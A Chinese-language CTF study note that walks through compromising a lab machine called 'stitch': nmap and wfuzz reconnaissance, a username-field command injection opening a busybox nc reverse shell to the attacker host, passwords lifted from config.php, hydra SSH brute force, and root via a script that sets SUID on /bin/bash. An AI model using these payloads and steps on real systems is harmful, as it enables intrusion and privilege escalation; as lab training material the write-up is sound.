stitch靶场学习笔记

正文

kali攻击机地址:192.168.1.4

靶场地址:192.168.1.19

1、端口扫描

在kali里,使用nmap工具:

bash 复制代码
nmap -sV -v -T4 -A 192.168.1.19

22和80端口是开放的。进入网页,发现域名stitch.dsz

2、域名重定向

修改kali中hosts:

bash 复制代码
 vi /etc/hosts

进入hosts文件里,添加:

bash 复制代码
192.168.1.19 stitch.dsz

:wq!退出,重新访问http://stitch.dsz ,发现域名重定向了:

使用子域名扫描工具:

bash 复制代码
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u stitch.dsz -H 'Host:FUZZ.stitch.dsz' --hw 1348

扫出来3个子域名,http://mail.stitch.dszhttp://dog.stitch.dszhttp://iot.stitch.dsz:

重新编辑kali里面的/etc/hosts文件:

bash 复制代码
192.168.1.19 stitch.dsz dog.stitch.dsz mail.stitch.dsz iot.Stitch.dsz

顺便修改windows下的Hosts文件:

bash 复制代码
C:\Windows\System32\drivers\etc\hosts

3、NC反弹

登录http://iot.stitch.dsz/,爆破用户名和密码的时候,可以对用户名构造nc连接语句:

bash 复制代码
;busybox nc 192.168.1.4 4444 -e /bin/bash;

调整格式:

bash 复制代码
/usr/bin/script -qc /bin/bash /dev/null
CTRL+Z
stty raw -echo;fg
reset
xterm
cd ..
find ./

4、文件查找

/www目录下有个./dog/config.php文件:

可以发现里面存了一堆密码:

bash 复制代码
3c4900896d92da
3c4900896d92da789abc
s3cur3P@ssw0rd

5、iiiii用户登录

先拿iiiii:3c4900896d92da对应的用户名、密码远程访问iiiii用户:

bash 复制代码
su - iiiii

6、/HOME下多用户筛选

筛选/home目录下的所有用户:

bash 复制代码
#写法1
ls -al | awk '{print $NF}'
#写法2,输出结果跳过前三行
ls -al | awk ' NR>3 {print $NF}'

7、多用户爆破

bash 复制代码
hydra -L usr.txt -P pass1.txt ssh://192.168.1.19 -I -e nrs

切换iotuser用户后,发现可以执行iot_runner的脚本:

8、iot_runner程序漏洞利用

iotuser用户下操作:

bash 复制代码
cd /tmp
vi a.sh
IOT#
chmod +s /bin/bash

chmod 600 /tmp/a.sh

iiiii用户下操作:

bash 复制代码
sudo /usr/bin/push_iot /tmp/a.sh

iotuser用户下操作:

bash 复制代码
sudo /usr/bin/iot_runner a.sh
bash -p

大致意思解释 :

(1)在 iotuser 下:创建恶意脚本

bash 复制代码
cd /tmp        # 进入临时目录(所有人可写)
vi a.sh        # 创建脚本 a.sh

脚本内容 最关键

复制代码
chmod +s /bin/bash
  • chmod +s:给文件设置 SUID 权限
  • /bin/bash:系统的 bash 命令行工具
  • 效果 :让 /bin/bash 变成 任何人运行都直接获得 root 权限

(2)设置脚本权限

bash 复制代码
chmod 600 /tmp/a.sh
  • 让脚本只能被 iotuser 读写
  • 避免被其他用户修改或删除

(3)在 iiiii 用户下:把脚本推给 iot_runner

bash 复制代码
sudo /usr/bin/push_iot /tmp/a.sh

作用:

  • /tmp/a.sh 放到 iot_runner 可以执行的位置
  • 让后面的 iot_runner 能找到并运行它

( 4)回到 iotuser以 root 权限执行恶意脚本

bash 复制代码
sudo /usr/bin/iot_runner a.sh
  1. iot_runnerroot 权限运行

  2. 它执行了你的 a.sh

  3. a.sh 执行:

    bash 复制代码
    chmod +s /bin/bash

    结果:/bin/bash 获得了 SUID root 权限


(5)最终:拿到 root 权限

bash 复制代码
bash -p

-p 是什么?

  • 保留 SUID 权限
  • 不降级权限
  • 直接以 root 身份打开 shell

执行完这一句,你就已经 从普通用户 → 变成 root 了!

相关推荐
执笔论英雄18 分钟前
【大模型推理 】 vllm kvconnet 学习
学习·vllm
后季暖24 分钟前
langgraph笔记
笔记
·醉挽清风·1 小时前
学习笔记—算法—算法题
笔记·学习·算法
西岸行者2 小时前
硬刚DeepSeek: UDPC与MTFAA的血缘辩论
笔记
a1117762 小时前
机器人导航入门指南(从 0 到 1)
笔记·学习·slam
Nebula_g2 小时前
大模型应用技术速通笔记
笔记·深度学习·机器学习·大模型
范什么特西3 小时前
每日学习-01
学习
旺仔丶歪歪乐3 小时前
英语启蒙APP分级体系拆解:本土课标分级与海外原版分级有什么区别
人工智能·学习·web app
xian_wwq3 小时前
【学习笔记】开源 vs 闭源:Llama / Qwen / DeepSeek 生态博弈(34/35)
笔记·学习·开源
振浩微433射频芯片3 小时前
5个IO控制20个LED?查理复用实战拆解
网络·单片机·物联网·学习·智能家居